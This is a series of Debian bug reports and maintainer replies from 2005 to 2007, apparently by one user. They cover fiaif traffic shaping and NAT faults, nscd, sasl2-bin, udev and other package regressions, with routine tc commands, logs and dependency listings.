Bug#343146: fiaif: Fiaif stops all traffic on CBQ shaped interfaces even when CBQ not enabled (on upgrade only)
Package: fiaif Version: 1.20.0-1 Severity: critical Justification: breaks the whole system I just installed latest FIAIF package, and when my ppp connection went down, and then up i was unable to browse the internet. After FIAIF upgrade, references to the CBQ shaper are left in the old zone files. It makes FIAIF not to process them, and thus machines behind those zones unrechable. I know the CBQ shaper has been deprecated, but if shaping is disabled, it should *not* try to process it. I had the following settings on zone.int TC_ENABLE=0 TC_TYPE=CBQ TC_DOWNLINK=410 TC_UPLINK=434 -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.13-a7n Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages fiaif depends on: hi bash 3.0-15The GNU Bourne Again SHell ii coreutils 5.2.1-2.1 The GNU core utilities ii cron 3.0pl1-92 management of regular background p ii debconf [debconf-2.0] 1.4.62Debian configuration management sy ii debianutils2.15.1Miscellaneous utilities specific t ii dnsutils 1:9.3.1-2.0.1 Clients provided with BIND ii grep 2.5.1.ds2-4 GNU grep, egrep and fgrep ii iptables 1.3.3-2 Linux kernel 2.4+ iptables adminis ii logtail1.2.42Print log file lines that have not ii net-tools 1.60-17 The NET-3 networking toolkit ii sed4.1.4-5 The GNU sed stream editor ii wget 1.10.1-1 retrieves files from the web fiaif recommends no packages. -- debconf information: fiaif/cron_logfile: * fiaif/warning: * fiaif/enable_cron: false * fiaif/enable_initd: true -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#343146: fiaif: Fiaif stops all traffic on CBQ shaped interfaces even when CBQ not enabled (on upgrade only)
Bastian Kleineidam wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi Laurent, sorry for taking so long to tackle your bug report. On Tue, Dec 13, 2005 at 07:49:50AM +0100, Laurent CARON wrote: I just installed latest FIAIF package, and when my ppp connection went down, and then up i was unable to browse the internet. After FIAIF upgrade, references to the CBQ shaper are left in the old zone files. It makes FIAIF not to process them, and thus machines behind those zones unrechable. I know the CBQ shaper has been deprecated, but if shaping is disabled, it should *not* try to process it. I had the following settings on zone.int TC_ENABLE=0 TC_TYPE=CBQ TC_DOWNLINK=410 TC_UPLINK=434 Are these the settings before the update, or after? Before and after updating What I suspect is that you had TC_ENABLE=1 With or without I had the same result before the update, and then the upgrade replaced your old configs with the new default ones which disabled the traffic shaping? No, nothing was replaced. Just the zone file that was using CBQ (but disabled by tc_enable=0) stopped working In this case, the qdiscs will not get removed by "/etc/init.d/fiaif stop", only if you do "/etc/init.d/fiaif tc-stop". So your old traffic shaping qdiscs will still be active. Perhaps this is the cause that fiaif did not work correctly. I flushed the rules and then restarted fiaif to regenerate it If possible, please send me via private mail ([EMAIL PROTECTED]) the output of "/etc/init.d/fiaif status". This should list all iptable rules and traffic shaping qdiscs. with version 1.20 ? -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#337677: knockd: Knockd fails when using a ppp interface
Package: knockd Version: 0.5-1 Severity: grave Justification: renders package unusable Knockd since last version is not working on ppp interfaces. It is not 'seeing' packets that should trigger it. Reverting back to an old version solves the problem. Laurent -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.13-a7n Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages knockd depends on: ii libc6 2.3.5-6GNU C Library: Shared libraries an ii libpcap0.80.9.4-1System interface for user-level pa ii logrotate 3.7.1-2Log rotation utility knockd recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#345168: Sarge version of nscd is completely broken (Fails to cache any entry)
Package: nscd Version: 2.3.2.ds1-22 Severity: critical Justification: breaks unrelated software I'm using nscd (sarge version) with LDAP, and it is not working. Attaching to it with strace -p $PID shows no activity while doing a simple ls -al /home with a few directories in /home, making constant LDAP lookups. Upgrading nscd to the one in sid solves the problem.. -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.15-rc7-dell520 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) (ignored: LC_ALL set to [EMAIL PROTECTED]) Versions of packages nscd depends on: ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#345170: fiaif: FIAIF NAT's any computer in any zone file if any other zone is set to nat 0.0.0.0/0 to 0.0.0.0/0
Package: fiaif Version: 1.20.0-2 Severity: critical Tags: security Justification: root security hole Facts: FIAIF with 3 zones zone.tun zone.int zone.ext zone.tun is used for a tun device zone.int is for the internal lan zone.ext is for the internet zone.int settings: SNAT[0]="EXT ALL 192.168.0.0/27=>0.0.0.0/0" zone.tun settings: SNAT[0]="EXT ALL 0.0.0.0/0=>0.0.0.0/0" What should happen? Any computer of the tun zone should be natted to the ext one. A computer in range 192.168.0.0/27 in the int zone should be natted. With those settings, any computer in any zone gets natted to ext. It seems to me to be a *big* security problem. Laurent -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.13-a7n Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages fiaif depends on: hi bash 3.0-15The GNU Bourne Again SHell ii coreutils 5.2.1-2.1 The GNU core utilities ii cron 3.0pl1-92 management of regular background p ii debconf [debconf-2.0] 1.4.66Debian configuration management sy ii debianutils2.15.2Miscellaneous utilities specific t ii dnsutils 1:9.3.1-2.0.1 Clients provided with BIND ii grep 2.5.1.ds2-4 GNU grep, egrep and fgrep ii iptables 1.3.3-2 Linux kernel 2.4+ iptables adminis ii logtail1.2.42Print log file lines that have not ii net-tools 1.60-17 The NET-3 networking toolkit ii sed4.1.4-5 The GNU sed stream editor ii wget 1.10.1-1 retrieves files from the web fiaif recommends no packages. -- debconf information: fiaif/cron_logfile: * fiaif/warning: * fiaif/enable_cron: false * fiaif/enable_initd: true -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#336777: bluez-utils: New version does not want me to connect anymore
Package: bluez-utils Version: 2.19-1 Severity: grave Justification: renders package unusable After having upgraded to new bluez-utils i'm unable to connect my phone (Ericsson T630) anymore. I can connect by deleting association and recreating *each time*. Downgrading to the stable version solves this problem. Thanks -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-pluton Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-1) (ignored: LC_ALL set to fr_FR) Versions of packages bluez-utils depends on: ii bluez-pin 0.25-1 Bluetooth PIN helper with D-BUS su ii dbus-1 0.23.4-7 simple interprocess messaging syst ii libbluetooth1 2.19-1 Library to use the BlueZ Linux Blu ii libc6 2.3.5-6 GNU C Library: Shared libraries an ii libusb-0.1-42:0.1.10a-21 userspace USB programming library ii module-init-tools 3.2-pre9-3 tools for managing Linux kernel mo ii modutils2.4.27.0-3 Linux module utilities ii sysvinit2.86.ds1-4 System-V like init bluez-utils recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#304339: ldap-utils: Adding users via smbldap-useradd (or other means) fails
Package: ldap-utils Version: 2.2.23-1 Severity: grave Justification: renders package unusable I installed ldap-utils on 8th April, and everything seemed fine until I tried to add a new user on my system. It complained about missing slappasswd (/usr/sbin/slappasswd -> ../lib/slapd). On another system, this file seems ok. Is it really a package related bug? A postinst bug? A. bug? -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.10-poweredge-64gb-20041227 Locale: LANG=en_CA, LC_CTYPE=en_CA (charmap=ISO-8859-1) Versions of packages ldap-utils depends on: ii libc6 2.3.2.ds1-20 GNU C Library: Shared libraries an ii libldap-2.2-7 2.2.23-1 OpenLDAP libraries ii libsasl22.1.19-1.5 Authentication abstraction library ii libssl0.9.7 0.9.7e-3 SSL shared libraries -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#324605: Generating graph fails with Unable to graph /var/lib/munin/domain/-nfs_client-commit-d.rrd: Garbage ':' after command:
Package: munin Version: 1.2.3-1 Severity: grave Justification: renders package unusable For 2 weeks now munin is broken on my system Following errors can be found in munin-graph.log aoû 22 06:31:04 - Graphed service : nfsd (0.01 sec * 4) aoû 22 06:31:04 - Unable to graph /var/lib/munin/unix-scripts.info/buckrogers.unix-scripts.info-df_inode-tmpfs-g.rrd: Garbage ':' after command: COMMENT: Cur: aoû 22 06:31:04 - Unable to graph /var/lib/munin/unix-scripts.info/buckrogers.unix-scripts.info-df_inode-tmpfs-g.rrd: Garbage ':' after command: COMMENT: Cur: aoû 22 06:31:04 - Unable to graph /var/lib/munin/unix-scripts.info/buckrogers.unix-scripts.info-df_inode-tmpfs-g.rrd: Garbage ':' after command: COMMENT: Cur: aoû 22 06:31:04 - Unable to graph /var/lib/munin/unix-scripts.info/buckrogers.unix-scripts.info-df_inode-tmpfs-g.rrd: Garbage ':' after command: COMMENT: Cur: -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12.1-a7n Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages munin depends on: pn libdigest-md5-perl (no description available) ii libhtml-template-perl 2.6-2 HTML::Template : A module for usin ii librrds-perl 1.2.11-0.2 Time-series data storage and displ pn libtime-hires-perl (no description available) ii perl [libstorable-perl] 5.8.7-4Larry Wall's Practical Extraction ii perl-modules 5.8.7-4Core Perl modules Versions of packages munin recommends: pn libdate-manip-perl (no description available) ii munin-node1.2.3-1network-wide graphing framework (n -- no debconf information
Bug#324605: Acknowledgement (Generating graph fails with Unable to graph /var/lib/munin/domain/-nfs_client-commit-d.rrd: Garbage ':' after command:)
Debian Bug Tracking System wrote: Thank you for the problem report you have sent regarding Debian. This is an automatically generated reply, to let you know your message has been received. It is being forwarded to the package maintainers and other interested parties for their attention; they will reply in due course. Your message has been sent to the package maintainer(s): Munin Debian Maintainers <[EMAIL PROTECTED]> If you wish to submit further information on your problem, please send it to [EMAIL PROTECTED] (and *not* to [EMAIL PROTECTED]). Please do not reply to the address at the top of this message, unless you wish to report a problem with the Bug-tracking system. Debian bug tracking system administrator (administrator, Debian Bugs database) Hi, My mistake It is not related to munin, but to librrd. Sorry for the noise. L.CARON -- Je n'ai pas besoin de Dieu pour expliquer le monde ; il ne contient que de la matière et de la pesanteur. -+- Pierre Simon de Laplace -+-
Bug#323142: libapache2-mod-perl2: File /etc/apache2/mods-available/perl.conf only contains Hi Mom!
Package: libapache2-mod-perl2 Version: 2.0.1-3 Severity: normal It is strange that file /etc/apache2/mods-available/perl.conf only contains "Hi Mom!" Don't you think so? Thanks Laurent -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12.1-a7n Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages libapache2-mod-perl2 depends on: ii apache2-common2.0.54-4 next generation, scalable, extenda ii libapr0 2.0.54-4 the Apache Portable Runtime ii libc6 2.3.5-3GNU C Library: Shared libraries an ii libdb4.2 4.2.52-19 Berkeley v4.2 Database Libraries [ ii libdevel-symdump-perl 2.03-3 Perl module for inspecting perl's ii libexpat1 1.95.8-3 XML parsing C library - runtime li ii libldap2 2.1.30-11 OpenLDAP libraries ii libperl5.85.8.7-4Shared Perl library ii liburi-perl 1.35-1 Manipulates and accesses URI strin ii libwww-perl 5.803-4WWW client/server library for Perl ii perl [libmime-base64-perl]5.8.7-4Larry Wall's Practical Extraction ii perl-base [perlapi-5.8.7] 5.8.7-4The Pathologically Eclectic Rubbis libapache2-mod-perl2 recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#402968: After upgrade nscd dies
Package: nscd Version: 2.3.6.ds1-8 Severity: important Hi, After each upgrade of nscd, i have to purge /var/db/nscd from old files. If i don't do it, nscd runs fine for a couple of mins, then dies. -- System Information: Debian Release: 4.0 APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-a7n-20061026-v3 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages nscd depends on: hi libc62.3.6.ds1-8 GNU C Library: Shared libraries nscd recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#398534: sasl2-bin: Unable to authenticate after upgrading from 2.1.19.dfsg1-0.5 to latest release
Package: sasl2-bin Version: 2.1.22.dfsg1-2 Severity: important After upgrading that package, I get the following errors in my mail.log when trying to authenticate for sending mails (using postfix). Nov 14 10:43:16 gw postfix/smtpd[3596]: connect from mailclient[ipOFmailCLIENT] Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication failure: no secret in database Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: mailclient[ipOFmailCLIENT] SASL CRAM-MD5 authentication failed: authentication failure Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication failure: no secret in database Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: mailclient[ipOFmailCLIENT] SASL NTLM authentication failed: authentication failure Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: SASL authentication failure: Password verification failed Nov 14 10:43:17 gw postfix/smtpd[3596]: warning: mailclient[ipOFmailCLIENT] SASL PLAIN authentication failed: authentication failure Nov 14 10:43:48 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:48 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:48 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:48 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:48 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:48 gw postfix/smtpd[3596]: warning: SASL authentication problem: unable to open Berkeley db /etc/sasldb2: Permission denied Nov 14 10:43:48 gw postfix/smtpd[3596]: warning: mailclient[ipOFmailCLIENT] SASL LOGIN authentication failed: authentication failure Nov 14 10:44:05 gw postfix/smtpd[3596]: lost connection after AUTH from mailclient[ipOFmailCLIENT] Nov 14 10:44:05 gw postfix/smtpd[3596]: disconnect from mailclient[ipOFmailCLIENT] /etc/default/saslauthd contains: START=yes MECHANISMS="pam" MECH_OPTIONS=" THREADS=5 OPTIONS="-c -m /var/run/saslauthd" Downgrading to the previous version solves the problem. -- System Information: Debian Release: 4.0 APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-a7n-20061026-v3 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages sasl2-bin depends on: hi libc62.3.6.ds1-8 GNU C Library: Shared libraries ii libcomer 1.39+1.40-WIP-2006.10.02+dfsg-2 common error description library ii libdb4.2 4.2.52+dfsg-1 Berkeley v4.2 Database Libraries [ ii libkrb53 1.4.4-4 MIT Kerberos runtime libraries hi libldap2 2.1.30-13+b1OpenLDAP libraries ii libpam0g 0.79-4 Pluggable Authentication Modules l ii libsasl2 2.1.22.dfsg1-2 Authentication abstraction library ii libssl0. 0.9.8c-3SSL shared libraries ii lsb-base 3.1-19 Linux Standard Base 3.1 init scrip sasl2-bin recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#398534: Acknowledgement (sasl2-bin: Unable to authenticate after upgrading from 2.1.19.dfsg1-0.5 to latest release)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 please note that removing libsasl2-2 solves the problem too. Laurent -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFFWZdYopql381F3/kRApU1AKCIDoLAnu75ftjuK2RF970sumzwsACg2Ch8 tnkG5JC4g6fCUUOqEVKVEUA= =l9MF -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#413909: fiaif: Shaping problem when upgrading from 1.20.x to 1.21.x
Package: fiaif Version: 1.21.1-2 Severity: important Hi, After a FIAIF upgrade to the latest build, it seems that traffic shaping is a bit broken on my setup. My internet link is now limited to about 1Mbit(downlink) when fiaif is running (instead of 20Mbit). Here are the tc shaping rules under 1.20.x tc qdisc add dev ppp0 root handle 1: htb default 20 tc class add dev ppp0 parent 1: classid 1:1 htb rate 846kbit burst 20k tc class add dev ppp0 parent 1:1 classid 1:10 htb rate 423kbit ceil 846kbit burst 10K prio 1 tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 253kbit ceil 846kbit burst 3k prio 2 tc class add dev ppp0 parent 1:1 classid 1:30 htb rate 169kbit ceil 846kbit burst 2k prio 3 tc qdisc add dev ppp0 parent 1:10 handle 10: pfifo limit 5 tc qdisc add dev ppp0 parent 1:20 handle 20: sfq perturb 10 tc qdisc add dev ppp0 parent 1:30 handle 30: sfq perturb 10 tc filter add dev ppp0 parent 1: protocol ip prio 10 u32 match ip tos 0x10 0xff flowid 1:10 tc filter add dev ppp0 parent 1: protocol ip prio 10 u32 match ip protocol 1 0xff flowid 1:10 tc filter add dev ppp0 parent 1: protocol ip prio 20 u32 match ip protocol 6 0xff match u8 0x05 0x0f at 0 match u16 0x 0xffc0 at 2 match u8 0x10 0xff at 33 flowid 1:10 tc filter add dev ppp0 parent 1: protocol ip prio 30 u32 match ip tos 0x08 0xff flowid 1:30 tc filter add dev ppp0 parent 1: protocol ip prio 40 u32 match ip dst 0.0.0.0/0 flowid 1:20 tc qdisc add dev ppp0 handle : ingress tc filter add dev ppp0 parent : protocol ip prio 50 u32 match ip src 0.0.0.0/0 police rate 22500kbit burst 10k drop flowid :1 Here are the tc shaping rules under 1.21.x tc qdisc add dev ppp0 root handle 1: htb default 20 tc class add dev ppp0 parent 1: classid 1:1 htb rate 846kbit mpu 64 mtu 1500 overhead 0 quantum 1500 burst 300b cburst 1500b tc class add dev ppp0 parent 1:1 classid 1:10 htb rate 423kbit ceil 846kbit prio 2 mpu 64 mtu 1500 overhead 0 quantum 1500 burst 300b cburst 1500b tc class add dev ppp0 parent 1:1 classid 1:20 htb rate 253kbit ceil 803kbit prio 3 mpu 64 mtu 1500 overhead 0 quantum 1500 burst 300b cburst 1500b tc class add dev ppp0 parent 1:1 classid 1:30 htb rate 169kbit ceil 803kbit prio 4 mpu 64 mtu 1500 overhead 0 quantum 1500 burst 300b cburst 1500b tc qdisc add dev ppp0 parent 1:10 handle 10: pfifo tc qdisc add dev ppp0 parent 1:20 handle 20: sfq perturb 10 tc qdisc add dev ppp0 parent 1:30 handle 30: sfq perturb 10 tc filter add dev ppp0 parent 1: prio 3 protocol ip u32 match ip tos 0x68 0xff flowid 1:10 tc filter add dev ppp0 parent 1: prio 4 protocol ip u32 match ip tos 0xb8 0xff flowid 1:10 tc filter add dev ppp0 parent 1: protocol ip prio 10 u32 match ip tos 0x10 0xff flowid 1:10 tc filter add dev ppp0 parent 1: protocol ip prio 20 u32 match ip protocol 6 0xff match u8 0x05 0x0f at 0 match u16 0x 0xffc0 at 2 flowid 1:10 tc filter add dev ppp0 parent 1: protocol ip prio 30 u32 match ip tos 0x08 0xff flowid 1:30 tc filter add dev ppp0 parent 1: protocol ip prio 40 u32 match ip dst 0.0.0.0/0 flowid 1:20 tc qdisc add dev ppp0 handle : ingress tc filter add dev ppp0 parent : protocol ip prio 50 u32 match ip src 0.0.0.0/0 police rate 21250kbit burst 5k drop flowid :1 I had to add an explicit HFSC statement in my zone.ext file to get things back tc qdisc add dev ppp0 root handle 1: hfsc default 22 tc class add dev ppp0 parent 1: classid 1:10 hfsc ls rate 705kbit ul rate 705kbit tc class add dev ppp0 parent 1:10 classid 1:11 hfsc rt umax 1500b dmax 20ms rate 128kbit ls rate 352kbit ul rate 705kbit tc class add dev ppp0 parent 1:10 classid 1:20 hfsc ls rate 352kbit ul rate 641kbit tc class add dev ppp0 parent 1:20 classid 1:21 hfsc rt umax 1500b dmax 50ms rate 64kbit ls rate 423kbit ul rate 705kbit tc class add dev ppp0 parent 1:20 classid 1:22 hfsc ls rate 211kbit ul rate 705kbit tc class add dev ppp0 parent 1:20 classid 1:23 hfsc ls rate 70kbit ul rate 669kbit tc qdisc add dev ppp0 parent 1:11 handle 11: pfifo limit 10 tc qdisc add dev ppp0 parent 1:21 handle 21: sfq perturb 10 tc qdisc add dev ppp0 parent 1:22 handle 22: sfq perturb 10 tc qdisc add dev ppp0 parent 1:23 handle 23: sfq perturb 10 tc filter add dev ppp0 parent 1: prio 3 protocol ip u32 match ip tos 0x68 0xff flowid 1:11 tc filter add dev ppp0 parent 1: prio 4 protocol ip u32 match ip tos 0xb8 0xff flowid 1:11 tc filter add dev ppp0 parent 1: protocol ip prio 10 u32 match ip tos 0x10 0xff flowid 1:21 tc filter add dev ppp0 parent 1: protocol ip prio 30 u32 match ip tos 0x08 0xff flowid 1:23 tc filter add dev ppp0 parent 1: protocol ip prio 40 u32 match ip dst 0.0.0.0/0 flowid 1:22 tc qdisc add dev ppp0 handle : ingress tc filter add dev ppp0 parent : protocol ip prio 100 u32 match ip tos 0x68 0xff police rate 128kbit buffer 10k continue flowid :1 tc filter add dev ppp0 parent : protocol ip prio 105 u32 match ip tos 0xb8 0xff police rate 128kbit buffer 10k continue flowid :1 tc filter add dev ppp0 parent : p
Bug#414184: fiaif: FIAIF + HSFC + more than 1 ppp interface shaping problem
Package: fiaif Version: 1.21.1-2 Severity: important Hi, After switching to FIAIF 1.21.1 and using the HSFC shaper, i've got a problem on a server which has two ppp internet links. Those two links were happily protected by a single zone using ppp+ as the interface name. After upgrading to the new version this is not possible anymore. It seems that the devide ppp+ is not anymore expanded to ppp0, ppp1 Here is the result of /etc/init.d/fiaif start with only 1 zone and HSFC. Setting up Traffic Shaping: ADSL Cannot find device "ppp+" Error: tc qdisc add dev ppp+ root handle 1: hfsc default 22 Cannot find device "ppp+" Error: tc class add dev ppp+ parent 1: classid 1:10 hfsc ls rate 233kbit ul rate 233kbit Cannot find device "ppp+" Error: tc class add dev ppp+ parent 1:10 classid 1:11 hfsc rt umax 1500b dmax 20ms rate 128kbit ls rate 116kbit ul rate 233kbit Cannot find device "ppp+" Error: tc class add dev ppp+ parent 1:10 classid 1:20 hfsc ls rate 116kbit ul rate 169kbit Cannot find device "ppp+" Error: tc class add dev ppp+ parent 1:20 classid 1:21 hfsc rt umax 1500b dmax 50ms rate 64kbit ls rate 139kbit ul rate 233kbit Cannot find device "ppp+" Error: tc class add dev ppp+ parent 1:20 classid 1:22 hfsc ls rate 69kbit ul rate 233kbit Cannot find device "ppp+" Error: tc class add dev ppp+ parent 1:20 classid 1:23 hfsc ls rate 23kbit ul rate 221kbit Cannot find device "ppp+" Error: tc qdisc add dev ppp+ parent 1:11 handle 11: pfifo limit 10 Cannot find device "ppp+" Error: tc qdisc add dev ppp+ parent 1:21 handle 21: sfq perturb 10 Cannot find device "ppp+" Error: tc qdisc add dev ppp+ parent 1:22 handle 22: sfq perturb 10 Cannot find device "ppp+" Error: tc qdisc add dev ppp+ parent 1:23 handle 23: sfq perturb 10 Cannot find device "ppp+" Error: tc filter add dev ppp+ parent 1: prio 3 protocol ip u32 match ip tos 0x68 0xff flowid 1:11 Cannot find device "ppp+" Error: tc filter add dev ppp+ parent 1: prio 4 protocol ip u32 match ip tos 0xb8 0xff flowid 1:11 Cannot find device "ppp+" Error: tc filter add dev ppp+ parent 1: protocol ip prio 10 u32 match ip tos 0x10 0xff flowid 1:21 Cannot find device "ppp+" Cannot find device "ppp+" Error: tc filter add dev ppp+ parent 1: protocol ip prio 30 u32 match ip tos 0x08 0xff flowid 1:23 Cannot find device "ppp+" Laurent -- Package-specific info: -- System Information: Debian Release: 4.0 APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.20.1-a7n-v1 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15) Versions of packages fiaif depends on: hi bash3.1dfsg-8The GNU Bourne Again SHell hi coreutils 5.97-5.3 The GNU core utilities ii cron3.0pl1-100 management of regular background p ii debconf [debconf-2.0] 1.5.11 Debian configuration management sy ii debianutils 2.17.5 Miscellaneous utilities specific t ii dnsutils1:9.3.4-2Clients provided with BIND ii grep2.5.1.ds2-6 GNU grep, egrep and fgrep ii iptables1.3.6.0debian1-5 administration tools for packet fi ii logtail 1.2.54 Print log file lines that have not ii net-tools 1.60-17 The NET-3 networking toolkit ii sed 4.1.5-1 The GNU sed stream editor hi wget1.10.2-2 retrieves files from the web fiaif recommends no packages. -- debconf information: fiaif/cron_logfile: * fiaif/warning: * fiaif/enable_cron: false * fiaif/enable_initd: true -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#413909: fiaif: Shaping problem when upgrading from 1.20.x to 1.21.x
Anders Peter Fugmann a écrit : What problem are you experiencing? Also the configuration parameters for the traffic shaping part would be nice. Regards Anders Fugmann Hi I was experiencing very low throughput. zone.ext had the following settings TC_ENABLE=1 TC_TYPE=HTB TC_DOWNLINK=2 TC_UPLINK=830 Laurent
Bug#385464: obconf: does not run with new openbox version
ln -is /usr/lib/libobrender.so.0.4.0 /usr/lib/libobrender.so.1 ln -is /usr/lib/libobparser.so.0.4.0 /usr/lib/libobparser.so.1 seem to fix the problem -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#383727: Latest udev makes system unbootable because /dev/mdXX are not created
Package: udev Version: 0.097-1 Severity: critical Justification: breaks the whole system I had to remove the symlink z60_mdadm.rules -> ../mdadm.rules to get system boot again. Since i have /boot on md0 (raid1) / on md1 (raid5) /boot would not mount. Removing the symlink makes the devices to be created again, and makes system to boot again. Everything is compiled in kernel (raid, ext3, reiser, ...) Laurent -- Package-specific info: -- /etc/udev/rules.d/: /etc/udev/rules.d/: total 8 lrwxrwxrwx 1 root root 20 2006-02-08 07:24 020_permissions.rules -> ../permissions.rules lrwxrwxrwx 1 root root 19 2006-01-11 08:20 025_libgphoto2.rules -> ../libgphoto2.rules lrwxrwxrwx 1 root root 16 2006-08-16 16:47 025_libsane.rules -> ../libsane.rules lrwxrwxrwx 1 root root 22 2005-12-06 20:42 025_logitechmouse.rules -> ../logitechmouse.rules lrwxrwxrwx 1 root root 13 2006-02-08 07:24 udev.rules -> ../udev.rules lrwxrwxrwx 1 root root 25 2006-04-02 22:35 z20_persistent-input.rules -> ../persistent-input.rules lrwxrwxrwx 1 root root 19 2006-02-08 07:24 z20_persistent.rules -> ../persistent.rules -rw-r--r-- 1 root root 682 2006-08-19 01:08 